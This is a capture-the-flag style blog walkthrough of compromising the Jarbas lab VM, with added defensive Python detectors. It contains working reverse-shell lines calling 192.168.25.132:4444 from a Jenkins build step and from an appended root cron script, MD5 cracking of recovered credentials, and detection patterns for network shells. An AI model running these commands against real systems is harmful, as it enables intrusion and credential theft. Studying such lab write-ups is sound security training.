Lab VM file location
C:\Users\28374\Documents\Virtual Machines\jabas
Nmap scan report for 192.168.3.57
Details
Nmap scan report for 192.168.3.57
Host is up (0.00060s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:C2:AC:2C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.00 seconds
Script scan
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Attack planning
22(ssh) 80(http) 3306(mysql) 8080(http-proxy)
Leave 22 for last; 80 is the web service and the main focus; look at 3306 together with 80; treat 8080 the same way as 80.
Command summary (commands follow the plan above)
nmap -sn 192.168.25.0/24
export ip=192.168.25.128
nmap --min-rate 10000 -p- 192.168.25.128
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
nmap -sT -sV -O -p22,80,3306,8080 192.168.25.128
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:C2:AC:2C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
nmap --script=vuln -p22,80,3306,8080 192.168.25.128
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.128
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.25.128:80/
|     Form id: wmtb
|     Form action: /web/submit
|
|     Path: http://192.168.25.128:80/
|     Form id:
|     Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|
|     Path: http://192.168.25.128:80/
|     Form id:
|_    Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:C2:AC:2C (VMware)


gobuster dir -u http://192.168.25.128 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
gobuster dir -u http://192.168.25.128 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php (pick the extensions from the technology stack you observed)
/index.html   (Status: 200) [Size: 32808]
/.html        (Status: 403) [Size: 207]
/access.html  (Status: 200) [Size: 359]
/.html        (Status: 403) [Size: 207]

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
These are obviously MD5 (cmd5-style) hashes; if you are not sure, check with a tool:
hash-identifier 5978a63b4654c73c60fa24f836386d87
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Now look them up:
MD5 lookup sites:
pmd5.com
ttmd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash
tiago:italia99
trindade:marianna
eder:vipsu
Login attempts (recovered credentials, weak passwords, default passwords, universal passwords)

Logging in as eder:vipsu succeeds.

Jenkins is a widely used open-source CMS.
Exploiting Jenkins
Create a new project


/bin/bash -i >& /dev/tcp/192.168.25.132/4444 0>&1
Listen on Kali:
nc -nvlp 4444
Run the build


Shell received
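The Jenkins step above works because a freestyle job's "Execute shell" build step runs arbitrary commands as the Jenkins service account. The detection below is an added example written for this write-up, not code from the post or from the Jenkins project: it parses a job's config.xml (Jenkins stores shell build steps under builders/hudson.tasks.Shell/command) and flags lines that look like a reverse shell or a download-and-execute. The config.xml content and the 192.0.2.10 address are constructed sample data; the indicator patterns are assumptions a defender would tune for their environment.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape Jenkins writes for a freestyle job with an
# "Execute shell" build step. The address is a TEST-NET placeholder, not from the post.
SAMPLE_JOB_XML = """<project>
  <description>nightly cleanup</description>
  <builders>
    <hudson.tasks.Shell>
      <command>echo cleaning
/bin/bash -i &gt;&amp; /dev/tcp/192.0.2.10/4444 0&gt;&amp;1</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

# Indicator patterns (assumed starting set; extend to taste).
SUSPICIOUS = [
    (re.compile(r"/dev/(tcp|udp)/"), "bash /dev/tcp redirection"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to shell"),
]


def shell_steps(xml_text):
    """Return the script text of every 'Execute shell' build step in a job config.xml."""
    root = ET.fromstring(xml_text)
    steps = []
    for shell in root.iter("hudson.tasks.Shell"):
        cmd = shell.find("command")
        if cmd is not None and cmd.text:
            steps.append(cmd.text)
    return steps


def flag_job(xml_text):
    """Return (indicator name, offending line) for each build-step line matching an indicator."""
    hits = []
    for script in shell_steps(xml_text):
        for line in script.splitlines():
            for pattern, name in SUSPICIOUS:
                if pattern.search(line):
                    hits.append((name, line.strip()))
    return hits


if __name__ == "__main__":
    # On a real controller you would iterate over $JENKINS_HOME/jobs/*/config.xml.
    for name, line in flag_job(SAMPLE_JOB_XML):
        print(f"[!] {name}: {line}")
```

Run this over every jobs/*/config.xml on the controller (or wire it to the audit log of job configuration changes). The underlying fix is not pattern matching, though: a user who can create or configure jobs can run code as the Jenkins account, so treat Job/Configure as an administrative permission and do not reuse application passwords for Jenkins accounts.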
whoami
uname -a
sudo -l
lsb_release
cat /etc/passwd

ls /home
There is only one user, eder.
Back in the ~ directory:
ls -lish

There is a users directory; the eder subdirectory inside it is accessible, and reading its XML file reveals a password hash.


#jbcrypt:$2a$10$fhvQ8iBCXnSMTvKB1.x9qO9O491DMrtO5cMChf.brW8q2pSpmi9SS
This is the JBCrypt (bcrypt) hash format.
john --format=bcrypt hash.txt
Save it to a file and try to crack it.
Cracking takes an extremely long time.
So go back to the reverse shell and try other privilege-escalation routes.
Scheduled tasks
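The contrast between the three MD5 hashes that resolved instantly on lookup sites and the bcrypt hash that john could not finish is the point worth taking away. The following is an added example for this write-up (not code from the post or from hash-identifier/john): it classifies a stored credential by format alone, parses the cost factor out of the bcrypt string found on the target, and shows why an unsalted MD5 is answerable from a precomputed table. The `summer2018` password in the demo is a constructed sample.

```python
import hashlib
import re

# Bcrypt string found on the target (from the post); used here only to parse its parameters.
PAGE_BCRYPT = "$2a$10$fhvQ8iBCXnSMTvKB1.x9qO9O491DMrtO5cMChf.brW8q2pSpmi9SS"

MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")
# Modular-crypt bcrypt layout: $2a$<2-digit cost>$<22-char salt><31-char digest>
BCRYPT = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)


def identify_hash(value):
    """Classify a stored credential string by format alone, as hash-identifier does.
    32 hex characters is ambiguous (MD5, NTLM, ...); a bcrypt string is self-describing."""
    value = value.strip()
    if MD5_HEX.match(value):
        return "md5-like"
    if BCRYPT.match(value):
        return "bcrypt"
    return "unknown"


def bcrypt_params(value):
    """Parse variant, cost factor and salt from a bcrypt string.
    The cost is log2 of the key-expansion rounds, so cost 10 means 1024 rounds per
    guess; that, plus the per-hash salt, is why john on bcrypt is slow where MD5 is instant."""
    m = BCRYPT.match(value.strip())
    if m is None:
        raise ValueError("not a bcrypt string")
    cost = int(m.group("cost"))
    return {"variant": m.group("variant"), "cost": cost,
            "rounds": 2 ** cost, "salt": m.group("salt")}


def md5_hex(password):
    """Unsalted MD5 as the web application stored it: same password, same hash, always."""
    return hashlib.md5(password.encode()).hexdigest()


def dictionary_lookup(stored_md5, wordlist):
    """Resolve an unsalted MD5 against a wordlist. With no salt and a microsecond
    per hash, a precomputed table (which is all the online md5 sites are) answers
    immediately; this is the weakness the three recovered accounts illustrate."""
    target = stored_md5.strip().lower()
    for word in wordlist:
        if md5_hex(word) == target:
            return word
    return None


if __name__ == "__main__":
    for h in ("5978a63b4654c73c60fa24f836386d87", PAGE_BCRYPT):
        print(h[:20], "->", identify_hash(h))
    print(bcrypt_params(PAGE_BCRYPT))
    # Constructed sample: a weak password stored as unsalted MD5.
    print(dictionary_lookup(md5_hex("summer2018"), ["password", "summer2018"]))
```

The defensive reading: the credential file under the web root should not have been reachable at all, and even if it were, bcrypt with a sensible cost (as Jenkins uses) would have bought the time that unsalted MD5 did not.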
cat /etc/cron.d
cat /etc/crontab
There is a script that runs with root privileges.


/etc/script/CleaningScript.sh is writable by anyone.
This is a non-interactive shell, so vim and nano cannot be used.
Use the stream editor sed, or append content with echo >>:
echo '/bin/bash -i >& /dev/tcp/192.168.25.132/4444 0>&1' >> /etc/script/CleaningScript.sh

Then wait for the scheduled task to run.
The crontab entry runs every 5 minutes,
so after a short wait the connection comes back.
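The root path here is a configuration defect, not a kernel bug: a root cron entry points at a script that non-root users can modify. The audit below is an added example for this write-up (not code from the post): it parses system-crontab lines (the /etc/crontab and /etc/cron.d form with a user field), follows each root entry to the script it executes, and reports scripts, or parent directories, that group or world can write to. The crontab text and the temporary directory tree it checks are constructed to mirror the lab, so the block runs without touching the real system.

```python
import os
import re
import stat
import tempfile

# A system-crontab entry: five time fields, a user, then the command.
CRON_LINE = re.compile(r"^\s*(?:[\w*,/-]+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text):
    """Return (user, command) for each active entry in /etc/crontab-style text."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank lines, comments, VAR=value lines
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group("user"), m.group("cmd")))
    return entries


def command_target(cmd):
    """Return the absolute path the command starts with, or None for shell one-liners."""
    first = cmd.split()[0]
    return first if first.startswith("/") else None


def writable_by_others(path):
    """True if the group or world write bit is set (symlinks are followed)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text, root="/"):
    """Findings for root entries whose target script or its directory is modifiable
    by non-root users. `root` lets the check run against a constructed tree."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        if user != "root":
            continue
        target = command_target(cmd)
        if target is None:
            continue
        real = os.path.join(root, target.lstrip("/"))
        if not os.path.exists(real):
            continue
        if writable_by_others(real):
            findings.append((target, "script writable by group/other"))
        elif writable_by_others(os.path.dirname(real)):
            findings.append((target, "parent directory writable by group/other"))
    return findings


# Constructed sample modelled on the crontab found on the target.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# cleanup job (constructed)
*/5 * * * * root /etc/script/CleaningScript.sh
0 2 * * * root /usr/local/bin/backup.sh
*/10 * * * * eder /home/eder/sync.sh
"""


def build_demo_tree():
    """Throwaway tree: CleaningScript.sh world-writable as on the target, plus one
    correctly permissioned script for contrast."""
    base = tempfile.mkdtemp()
    for d in ("etc/script", "usr/local/bin"):
        os.makedirs(os.path.join(base, d))
        os.chmod(os.path.join(base, d), 0o755)
    bad = os.path.join(base, "etc/script/CleaningScript.sh")
    good = os.path.join(base, "usr/local/bin/backup.sh")
    for path in (bad, good):
        with open(path, "w") as f:
            f.write("#!/bin/bash\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    return base


def demo():
    """Run the audit over the constructed tree and crontab."""
    return audit_crontab(SAMPLE_CRONTAB, root=build_demo_tree())


if __name__ == "__main__":
    for target, reason in demo():
        print(f"[!] root cron target {target}: {reason} (fix: chmod go-w {target}, chown root)")
```

On a real host you would feed it the contents of /etc/crontab and each file under /etc/cron.d, and extend `command_target` for entries that invoke an interpreter (`/bin/bash /path/script.sh`). The remediation is the same either way: root-owned scripts, mode 0755 or tighter, in a root-owned directory.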

The john run above never cracked the hash.
It won't crack; forget it.

Unless otherwise stated, all posts on this blog are the author's original work.
If you repost, please credit the source: https://www.oneblanks.xyz/jarbas%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/